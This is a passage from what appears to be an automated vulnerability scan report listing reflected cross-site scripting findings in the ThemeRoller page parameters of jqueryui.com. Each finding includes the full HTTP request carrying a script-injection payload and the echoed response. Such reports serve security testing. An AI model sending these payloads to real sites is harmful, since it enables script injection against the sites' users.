User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa52c0c"><script>alert(1)</script>392fcb08d71&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

1.9. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7add9"><script>alert(1)</script>6148fa48b45 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa7add9"><script>alert(1)</script>6148fa48b45&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa7add9"><script>alert(1)</script>6148fa48b45&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.10. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b9da"><script>alert(1)</script>86889186ca9 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=02b9da"><script>alert(1)</script>86889186ca9&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
8&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=02b9da"><script>alert(1)</script>86889186ca9&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColor
...[SNIP]...

1.11. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5748e"><script>alert(1)</script>247c52aef85 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=05748e"><script>alert(1)</script>247c52aef85&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=05748e"><script>alert(1)</script>247c52aef85&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault
...[SNIP]...

1.12. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53ba4"><script>alert(1)</script>d9d50feafdb was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=053ba4"><script>alert(1)</script>d9d50feafdb&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nt=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=053ba4"><script>alert(1)</script>d9d50feafdb&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgCo
...[SNIP]...

1.13. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15aa"><script>alert(1)</script>ffc4cddc3d9 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0f15aa"><script>alert(1)</script>ffc4cddc3d9&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
f7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0f15aa"><script>alert(1)</script>ffc4cddc3d9&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

1.14. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 870d8"><script>alert(1)</script>8356350c402 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0870d8"><script>alert(1)</script>8356350c402&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0870d8"><script>alert(1)</script>8356350c402&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222
...[SNIP]...

1.15. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb024"><script>alert(1)</script>61029ab1dc6 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0bb024"><script>alert(1)</script>61029ab1dc6&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0bb024"><script>alert(1)</script>61029ab1dc6&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203
...[SNIP]...

1.16. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e69a"><script>alert(1)</script>1b69ddd11c1 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=08e69a"><script>alert(1)</script>1b69ddd11c1&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Default=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=08e69a"><script>alert(1)</script>1b69ddd11c1&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgCo
...[SNIP]...

1.17. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a86e"><script>alert(1)</script>86153e925ae was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=03a86e"><script>alert(1)</script>86153e925ae&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=03a86e"><script>alert(1)</script>86153e925ae&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

1.18. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

